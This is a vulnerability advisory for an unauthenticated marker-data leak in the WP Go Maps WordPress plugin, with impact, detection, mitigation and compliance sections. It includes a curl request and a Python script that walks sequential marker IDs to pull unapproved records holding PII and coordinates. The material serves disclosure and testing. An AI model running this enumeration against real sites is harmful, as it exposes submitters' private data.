CVE-2026-8386
Status: Received - Intake
Unauthenticated Marker Data Exposure in WP Go Maps

Publication date: 2026-06-15

Last updated on: 2026-06-15

Assigner: WPScan

Description
The WP Go Maps WordPress plugin before 10.0.10 does not perform any approval-state filtering on its public single-marker REST endpoint, allowing unauthenticated users to retrieve marker records that an administrator has not yet approved for public display, including any PII placed in the address and description fields and the marker's geographic coordinates.
Affected Vendors & Products
Vendor       Product      Version / Range
wp_go_maps   wp_go_maps   before 10.0.10 (10.0.10 itself not affected)
CWE ID: CWE-UNKNOWN (no weakness class assigned)
Executive Summary

CVE-2026-8386 affects the WP Go Maps WordPress plugin in versions before 10.0.10. The plugin's public single-marker REST endpoint returns a marker record by ID without checking whether an administrator has approved that marker for public display.

An unauthenticated visitor can therefore read markers that are still sitting in the moderation queue, including any PII entered in the address and description fields and the marker's latitude and longitude.

Because marker IDs are sequential integers, the entire moderation queue can be walked by requesting consecutive IDs from the REST endpoint or from the plugin's AJAX fallback, with no login required.

Impact Analysis

The flaw discloses data that was explicitly held back from publication: PII and precise location data for markers an administrator had not yet approved.

An attacker who enumerates the queue obtains every pending marker in full, which compromises the privacy of the people who submitted them and of anyone named in the address or description fields.

Depending on what submitters entered, the exposure can erode user trust, constitute a privacy violation, and carry reputational or legal consequences for the site operator.

Detection Guidance

To test for this issue, request the plugin's public single-marker REST endpoint without any authentication (no cookies, no nonce) and check whether it returns marker records that the administrator has not yet approved.

Because marker IDs are sequential integers, markers can be requested by ID from the REST endpoint, or from its AJAX fallback, for consecutive IDs, and each response inspected for address, description, latitude and longitude values.

An illustrative curl request for one marker ID (the route shown here is the page's example; confirm the real route on the target site, since the unauthenticated WordPress REST index at /wp-json/ lists every registered namespace and route):

  • curl -X GET https://your-wordpress-site.com/wp-json/wp-go-maps/v1/marker/{marker_id}

Replace {marker_id} with consecutive integers. The reliable way to confirm the flaw on a site you are authorised to test is to create a marker as an administrator, leave it unapproved, note its ID, and then request that ID unauthenticated: a response carrying the marker's fields demonstrates the exposure, whereas an endpoint that filters correctly should not return the unapproved record.
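The enumeration check described above, as an added example that is not part of the advisory or of the plugin's own code. It assumes the route /wp-json/wp-go-maps/v1/marker/{id} from the curl line (confirm it against the site's /wp-json/ index, which lists registered namespaces) and that a marker record comes back as a JSON object carrying some of the fields address, description, lat and lng; those field names are assumptions, not taken from the plugin. The HTTP fetcher is injectable so the classifier can be exercised on constructed responses without touching a live site.

```python
"""Unauthenticated marker enumeration probe for CVE-2026-8386 (added example).

Assumptions not confirmed by the advisory text:
  - the single-marker route is /wp-json/wp-go-maps/v1/marker/<id>;
  - a marker record is a JSON object with some of address/description/lat/lng.
Run only against a site you are authorised to test.
"""
import json
import urllib.error
import urllib.request

MARKER_FIELDS = ("address", "description", "lat", "lng")   # assumed field names
ROUTE_TEMPLATE = "/wp-json/wp-go-maps/v1/marker/{id}"       # assumed route


def http_get(url, timeout=10):
    """Plain unauthenticated GET: no cookies, no nonce. Returns (status, body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2026-8386-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def candidate_namespaces(index_body):
    """From the /wp-json/ index, pick REST namespaces that look like the maps plugin."""
    data = json.loads(index_body)
    return [ns for ns in data.get("namespaces", []) if "map" in ns.lower()]


def classify(status, body):
    """Decide what one unauthenticated single-marker response discloses.

    Returns (verdict, populated_fields) where verdict is
    'exposed' (200 with marker data), 'blocked' (401/403) or 'absent'.
    """
    if status in (401, 403):
        return "blocked", []
    if status != 200:
        return "absent", []
    try:
        data = json.loads(body)
    except ValueError:
        return "absent", []
    if isinstance(data, list) and data:      # tolerate a record wrapped in a list
        data = data[0]
    if not isinstance(data, dict):
        return "absent", []
    found = [f for f in MARKER_FIELDS if data.get(f) not in (None, "")]
    return ("exposed" if found else "absent"), found


def enumerate_markers(base_url, first_id, last_id, fetch=http_get):
    """Walk sequential IDs; return [(id, verdict, fields)] for every non-absent ID.

    Compare the 'exposed' IDs against the moderation queue in wp-admin: any ID
    that is unapproved there but exposed here confirms the vulnerability.
    """
    hits = []
    for marker_id in range(first_id, last_id + 1):
        url = base_url.rstrip("/") + ROUTE_TEMPLATE.format(id=marker_id)
        verdict, fields = classify(*fetch(url))
        if verdict != "absent":
            hits.append((marker_id, verdict, fields))
    return hits


if __name__ == "__main__":
    import sys
    site = sys.argv[1] if len(sys.argv) > 1 else "https://your-wordpress-site.com"
    print("map-like namespaces:", candidate_namespaces(http_get(site + "/wp-json/")[1]))
    for marker_id, verdict, fields in enumerate_markers(site, 1, 200):
        print(marker_id, verdict, ",".join(fields))
```

The verdict is deliberately coarse: the public response cannot be expected to say whether a marker is approved, so the confirming step is still the comparison against the admin's moderation queue (or against a test marker you created and left unapproved). A site that returns 401/403 for the route is reported as blocked rather than safe, since the AJAX fallback may still answer.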

Mitigation Strategies

Update WP Go Maps to version 10.0.10 or later, where the issue is fixed.

Until the update can be applied, restrict the plugin's marker endpoints to authenticated users (for example with a must-use plugin that short-circuits requests to the plugin's REST namespace through the rest_pre_dispatch filter, or with a web-server or WAF rule on the route path), or disable the plugin temporarily. Two caveats: the same data is reachable through the plugin's AJAX fallback, so a rule that only covers the REST route is incomplete, and blocking the public endpoint will also break any front-end maps that load marker data through it. Reviewing the moderation queue and deleting pending markers that hold PII reduces what can be read in the meantime.

Compliance Impact

Because the unfiltered endpoint exposes PII and location data that were never approved for publication, exploitation is a personal-data disclosure that may trigger breach-notification and accountability obligations under GDPR for EU data subjects, and under HIPAA where a covered entity has placed protected health information in marker fields.

Which regime applies depends on the site operator and on what submitters actually entered into the address and description fields; the plugin does not determine the sensitivity of the data, it merely fails to keep unapproved records private.
